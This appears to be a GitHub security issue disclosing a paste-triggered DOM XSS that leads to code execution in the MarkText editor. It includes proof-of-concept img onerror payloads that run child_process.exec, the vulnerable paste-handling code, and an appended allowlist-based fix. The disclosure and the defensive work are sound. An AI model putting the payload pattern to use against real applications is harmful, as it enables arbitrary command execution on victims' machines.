Security issue: DOM based XSS & RCE - from pasting vulnerable HTML #2990

Closed
@luiseok

Description


An attacker can induce Mark Text users to copy the HTML code below to execute a Remote Code Execution attack via XSS.

<!-- for windows -->
<table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
<!-- for linux (tested with kali) -->
<table><tr><img src onerror="require('child_process').exec('xdg-open .')"></tr></table>

The above code is inserted into Mark Text's DOM by the source code below, and remote code execution is achieved by calling child_process from the inline script.

ContentState.prototype.checkCopyType = function (html, text) {
  let type = 'normal'
  if (!html && text) {
    type = 'copyAsMarkdown'
    const match = /^<([a-zA-Z\d-]+)(?=\s|>).*?>[\s\S]+?<\/([a-zA-Z\d-]+)>$/.exec(text.trim())
    if (match && match[1]) {
      const tag = match[1]
      if (tag === 'table' && match.length === 3 && match[2] === 'table') {
        // Try to import a single table
        const tmp = document.createElement('table')
        tmp.innerHTML = text
        if (tmp.childElementCount === 1) {
          return 'htmlToMd'
        }
      }
      // TODO: We could try to import HTML elements such as headings, text and lists to markdown for better UX.
      type = PARAGRAPH_TYPES.find(type => type === tag) ? 'copyAsHtml' : type
    }
  }
  return type
}

  • Can you reproduce the issue?

Steps to reproduce

  1. Copy the vulnerable HTML code
    • <table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
  2. Paste it into Mark Text app

Expected behavior:

HTML should be sanitized before being pasted into the DOM.

Actual behavior:

There is no HTML sanitization step; it only checks whether the input is wrapped in <table>.

Link to an example: [optional]

bandicam.2022-02-08.01-33-25-900-cut.mp4
bandicam.2022-02-08.01-33-25-900.mp4

Versions

  • MarkText version: v0.16.3
  • Operating system:
    Windows 11 Version 21H2 - OS Build 22000.469
    Kali Linux Kali GNU/Linux Rolling 2021.4
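As an added illustration of the fix the report asks for (this is example code, not MarkText's own), here is an allowlist gate for the "import a single table" paste path that runs before any innerHTML assignment. It is pure string handling so it runs under Node without a DOM; the names ALLOWED_TAGS, ALLOWED_ATTRS, isAllowlistedTableHtml and checkCopyTypeHardened are assumptions of this example.

```javascript
// Added example, not MarkText's code: an allowlist gate for the "import a single
// table" paste path described in the issue. Pure string handling, so it runs
// under Node without a DOM. Assumed names: ALLOWED_TAGS, ALLOWED_ATTRS,
// isAllowlistedTableHtml, checkCopyTypeHardened.
const ALLOWED_TAGS = new Set(['table', 'thead', 'tbody', 'tfoot', 'tr', 'th', 'td',
  'caption', 'b', 'strong', 'i', 'em', 'code', 'br']);
const ALLOWED_ATTRS = new Set(['colspan', 'rowspan', 'align']);

// One tag with its attribute list; the value alternatives keep quoted values intact.
const TAG_RE = /<(\/?)([a-zA-Z][\w-]*)((?:\s+[^\s=>\/]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?)*)\s*\/?>/g;
const ATTR_RE = /([^\s=\/]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?/g;

// True only if every tag and every attribute is on the allowlist AND the tokenizer
// accounted for every '<' and '>' in the input. Anything it cannot tokenize (a
// comment, a stray bracket, an unknown tag such as <img>) fails closed.
function isAllowlistedTableHtml(text) {
  const rest = text.replace(TAG_RE, (whole, slash, name, attrs) => {
    if (!ALLOWED_TAGS.has(name.toLowerCase())) return '<'; // marker -> rejected below
    for (const m of attrs.matchAll(ATTR_RE)) {
      if (!ALLOWED_ATTRS.has(m[1].toLowerCase())) return '<';
    }
    return '';
  });
  return !/[<>]/.test(rest);
}

// Hardened version of the table branch of checkCopyType from the issue: same
// leading regex, but the gate runs before any innerHTML assignment. Rejected input
// is classified 'normal' (plain text) instead of being parsed as HTML. The
// PARAGRAPH_TYPES branch of the original is omitted here for brevity.
const TABLE_RE = /^<([a-zA-Z\d-]+)(?=\s|>).*?>[\s\S]+?<\/([a-zA-Z\d-]+)>$/;
function checkCopyTypeHardened(html, text) {
  if (html || !text) return 'normal';
  const trimmed = text.trim();
  const match = TABLE_RE.exec(trimmed);
  if (!match || match[1] !== 'table' || match[2] !== 'table') return 'copyAsMarkdown';
  // In the app, input that passes should still be parsed in an inert context
  // (DOMParser or <template>), never via innerHTML on a live-document element,
  // because that instantiates <img onerror> handlers even while detached.
  return isAllowlistedTableHtml(trimmed) ? 'htmlToMd' : 'normal';
}
```

The gate deliberately rejects anything it cannot fully tokenize, so a cell containing a bare `<` is refused too; in production, a real HTML parser or a library such as DOMPurify is the right tool, and this regex tokenizer only shows where the check belongs.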
